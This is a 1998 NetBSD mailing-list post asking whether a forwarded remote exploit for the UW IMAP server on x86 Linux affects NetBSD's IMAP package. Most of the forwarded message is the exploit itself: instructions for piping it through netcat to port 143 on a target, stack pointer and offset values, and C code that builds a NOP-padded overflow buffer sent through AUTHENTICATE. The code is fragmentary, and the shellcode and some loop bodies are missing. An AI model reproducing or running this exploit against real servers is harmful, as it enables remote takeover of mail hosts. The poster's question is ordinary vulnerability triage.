Subject: new exploit for linux imap (fwd)
To: None <tech-pkg@NetBSD.ORG>
From: Markus Illenseer <>
List: tech-pkg
Date: 07/23/1998 18:19:20
 Does this affect our IMAP-package? Does it affect NetBSD at all?

---------- Forwarded message ----------
Date: Thu, 23 Jul 1998 02:29:05 +0200
From: "" <joanra@JET.ES>
Subject: new exploit for linux imap

   UW Imap remote exploit for x86Linux by Juan A. Fernández Jiménez
   Systems affect: Ummm...I only tested it in IMAP4rev1v10.203
   Greetz to: Koji, Sud, Darkmoon, Marneus, NBH Group ...
   How to use: # (./imaplinux;cat) | nc target_host 143
   This exploit is based in the remote exploit created by Cheez Whiz.
   You feel free to change the nops,offsets and esp...the shellcode is
   all original from me... :P problems with toupper()
                ESP=0xBFFFF04C for v10.203
   22/07/98 23:26

#define BUF 2048
#define NOP 0x90

char shellcode[]=

char buffer[BUF];
long int nop=422,esp=0xBFFFF04C,offset=100;

void main() {
int cont;


for(cont=nop+strlen(shellcode);cont < BUF-4;cont+=4) *((int *)

printf("* AUTHENTICATE {%d}\r\n",BUF);
for(cont=0;cont<sizeof(buffer);cont++) putchar(buffer[cont]);

---> DPN-Mailingliste: <---

----- End of forwarded message from Harald Wieland -----

Markus Illenseer
NetBSD 1.3.2 CD-ROM "Gateway! Vol. 3" now shipping!  See: